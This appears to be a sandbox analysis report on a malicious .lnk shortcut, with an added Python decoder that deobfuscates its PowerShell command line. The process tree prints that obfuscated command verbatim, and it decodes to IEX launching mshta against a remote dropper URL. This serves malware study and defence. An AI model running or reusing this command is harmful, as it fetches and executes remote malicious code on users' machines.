Analysis
max time kernel: 44s
max time network: 48s
platform: windows7_x64
resource: win7-20220414-en
submitted: 24-05-2022 12:24

Static task: static1
Behavioral task: behavioral1
Sample: 54267-876-8676.lnk
Resource: win7-20220414-en (windows7_x64)
0 signatures, 0 seconds
General
Target: 54267-876-8676.lnk
Size: 2KB
MD5: 9edabe11d846a6de5d337e737d24e85c
SHA1: 26f63aac40c4e9f459a379eec94a258b604f582e
SHA256: 4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023
SHA512: 5e88d418cb26f4bfd7bf5d1b2dbf31a8f026bbf29c760919d2986c883de6067df75c5eb8ca790a2c4a7ef09b87a2c6ba1b62e57e76fc3b32af633317639c6f0e
Score: 10/10
Malware Config
Extracted
Language: hta
Source:
URLs: hta.dropper https://modhub.com.br/upload.hta
Signatures

Blocklisted process makes network request (4 IoCs)
Processes:
  flow 4, pid 428, mshta.exe
  flow 5, pid 428, mshta.exe
  flow 6, pid 428, mshta.exe
  flow 7, pid 428, mshta.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(This is the sandbox's generic description of the heuristic. The behaviour actually recorded in this run is a PowerShell-to-mshta download chain; no file encryption activity appears anywhere else in the report.)

Modifies Internet Explorer settings
Processes:
  mshta.exe: Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid 1832, powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  Token: SeDebugPrivilege, pid 1832, powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  PID 536 (cmd.exe) wrote to memory of 1832 (powershell.exe)
  PID 536 (cmd.exe) wrote to memory of 1832 (powershell.exe)
  PID 536 (cmd.exe) wrote to memory of 1832 (powershell.exe)
  PID 1832 (powershell.exe) wrote to memory of 428 (mshta.exe)
  PID 1832 (powershell.exe) wrote to memory of 428 (mshta.exe)
  PID 1832 (powershell.exe) wrote to memory of 428 (mshta.exe)
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c C:\Users\Admin\AppData\Local\Temp\54267-876-8676.lnk
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\mshta.exe
         "C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta
         - Blocklisted process makes network request
         - Modifies Internet Explorer settings
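The PowerShell command line above is a small character-offset obfuscator: every character of the real command is stored as its code point plus 96471 in an integer array, a throwaway function subtracts that constant and rebuilds the string with [char], the first array decodes to the cmdlet name that gets aliased with sal, and the alias is then invoked on the second array. The decoder below is an added example written for this page, not part of the sandbox report or the sample; it takes the command line exactly as recorded, strips the <# #> comment noise, follows the [char]($x-$y) expression back to the offset constant, and resolves which decoded string is the aliased cmdlet and which is its argument. The regular expressions assume the same arrangement seen in this sample (integer arrays, one integer offset variable, sal plus a double-parenthesised call), so they generalise to other command lines built with this scheme but not to unrelated obfuscators.

```python
import re

# The obfuscated PowerShell command line recorded in the process tree above,
# copied verbatim from the report (it is the only input this decoder needs).
CMDLINE = r"""<#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));"""

# <# ... #> block comments carry no code; the sample sprinkles them as noise.
COMMENT_RE = re.compile(r"<#.*?#>", re.S)
# $name=@(n,n,n,...)  integer arrays holding the encoded characters
ARRAY_RE = re.compile(r"\$(\w+)\s*=\s*@\(\s*((?:-?\d+\s*,\s*)*-?\d+)\s*\)")
# [char]($elem-$offset)  the decode step; group 2 names the offset variable
CHAR_SUB_RE = re.compile(r"\[char\]\(\s*\$(\w+)\s*-\s*\$(\w+)\s*\)")
# $name=12345;  a plain integer assignment (the offset constant)
INT_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(-?\d+)\s*;")
# sal ALIAS (decodefn $var)  aliasing the decoded cmdlet name
ALIAS_RE = re.compile(r"\bsal\s+(\w+)\s*\(\s*\w+\s+\$(\w+)\s*\)")


def strip_block_comments(text):
    return COMMENT_RE.sub("", text)


def find_offset(text):
    """Return the integer subtracted from every array element, found by
    following the [char]($x-$y) expression back to $y's assignment."""
    sub = CHAR_SUB_RE.search(text)
    if sub is None:
        raise ValueError("no [char]($x-$y) decode expression found")
    offset_var = sub.group(2)
    for name, value in INT_ASSIGN_RE.findall(text):
        if name == offset_var:
            return int(value)
    raise ValueError(f"offset variable ${offset_var} is never assigned an integer")


def decode_arrays(text, offset):
    """Map every integer-array variable to the string it encodes."""
    decoded = {}
    for name, body in ARRAY_RE.findall(text):
        chars = []
        for raw in body.split(","):
            code_point = int(raw) - offset
            if not 0 <= code_point <= 0x10FFFF:
                raise ValueError(f"${name}: element {raw.strip()} does not decode to a character")
            chars.append(chr(code_point))
        decoded[name] = "".join(chars)
    return decoded


def decode_command(cmdline):
    """Strip comments, recover the offset, decode the arrays, then work out
    which decoded string is the aliased cmdlet and which is its argument."""
    text = strip_block_comments(cmdline)
    offset = find_offset(text)
    arrays = decode_arrays(text, offset)
    result = {"offset": offset, "arrays": arrays, "alias_target": None, "payload": None}
    alias = ALIAS_RE.search(text)
    if alias is not None:
        alias_name, target_var = alias.groups()
        result["alias_target"] = arrays.get(target_var)
        # ALIAS((decodefn $var))  the invocation that passes the payload
        call = re.search(re.escape(alias_name) + r"\s*\(\(\s*\w+\s+\$(\w+)\s*\)\)", text)
        if call is not None:
            result["payload"] = arrays.get(call.group(1))
    return result


if __name__ == "__main__":
    info = decode_command(CMDLINE)
    print("offset      :", info["offset"])
    for name, value in info["arrays"].items():
        print(f"${name:<20} -> {value!r}")
    print("alias target:", info["alias_target"])
    print("payload     :", info["payload"])
```

Run stand-alone it reports the offset 96471, $IMvbvbxLdUneQIhgXc as IEX and $tEIiiZsclbDp as mshta https://modhub.com.br/upload.hta, which is exactly the child process the sandbox recorded at depth 3. Decoding statically rather than re-executing the command keeps the analysis offline, and the same approach works whatever the random variable names are, since nothing in the decoder depends on them.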
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
memory/428-97-0x0000000000000000-mapping.dmp
memory/536-54-0x000007FEFB721000-0x000007FEFB723000-memory.dmp (Filesize: 8KB)
memory/1832-88-0x0000000000000000-mapping.dmp
memory/1832-93-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp (Filesize: 10.1MB)
memory/1832-94-0x0000000002054000-0x0000000002057000-memory.dmp (Filesize: 12KB)
memory/1832-95-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp (Filesize: 11.4MB)
memory/1832-96-0x000000001B780000-0x000000001BA7F000-memory.dmp (Filesize: 3.0MB)
memory/1832-98-0x000000000205B000-0x000000000207A000-memory.dmp (Filesize: 124KB)